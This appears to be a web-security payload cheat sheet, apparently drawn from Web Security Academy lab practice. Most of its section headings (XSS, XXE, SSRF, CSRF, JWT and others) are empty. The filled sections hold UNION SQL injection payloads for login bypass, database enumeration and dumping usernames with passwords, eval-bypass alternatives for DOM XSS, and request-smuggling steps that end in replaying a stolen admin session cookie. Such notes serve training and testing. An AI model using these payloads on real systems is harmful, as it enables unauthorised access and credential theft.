Payloads

SQLi

UNION SQLi

#clause bypass
'+OR+1=1--

#login bypass
administrator'--

#union detection
'+ORDER+BY+1--
'+ORDER+BY+2--
'+ORDER+BY+3--
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'abcdef',NULL,NULL--

#Oracle version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--

#MySQL and Microsoft version
'+UNION+SELECT+@@version,+NULL#

#Tables names
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--

#Tables names Oracle
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--

#More columns in one
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--

Blind SQLi

Blind error based SQLi

Visible Error

Blind Time-based

Out of Band Interactions

SQLI inside XML

XSS

DOM-based XSS

  • Using the eval() method evaluates or executes an argument.

  • Using atob() or btoa() is function used for encoding to and from base64 format strings.

  • If eval() being blocked then Alternatives:

    • setTimeout("code")

    • setInterval("code)

    • setImmediate("code")

    • Function("code")()

XSS web messages

Reflected

Stored

XSS stealers

XSS to CSRF

CSRF

CSWSH - Cross-Site WebSocket Hijacking

CORS

XXE

Blind XXE

External DTD XXE

XInclude injection

XXE image upload

SSRF

Request Smuggling

CL.TE

TE.CL

H2.CL

  1. Send the request a few times and confirm that you receive a redirect to the exploit server.

  2. Resend the request and wait for 10 seconds or so.

  3. Go to the exploit server and check the access log. If you see a GET /resources/ request from the victim, this indicates that your request smuggling attack was successful

H2.TE

Send the request to poison the response queue. You will receive the 404 response to your own request.

Wait for around 5 seconds, then send the request again to fetch an arbitrary response.

Repeat this process until you capture a 302 response containing the admin's new post-login session cookie.

Copy the session cookie and use it to send the following request:

GET /admin HTTP/2

Host: YOUR-LAB-ID.web-security-academy.net

Cookie: session=STOLEN-SESSION-COOKIE

H2 CRLF Injeciton

http2-inspector

Note: enable the Allow HTTP/2 ALPN override option and change the body of HTTP/2 request to below POST request.

H2.TE desync v10a h2path

CL.0

  1. Using the drop-down menu next to the Send button, change the send mode to Send group in sequence (single connection).

OS cmd injection

SSTI

Path Traversal

Authentication

Web Sockets

oAuth

Deserialization

JWT

https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

Prototype pollution

Last updated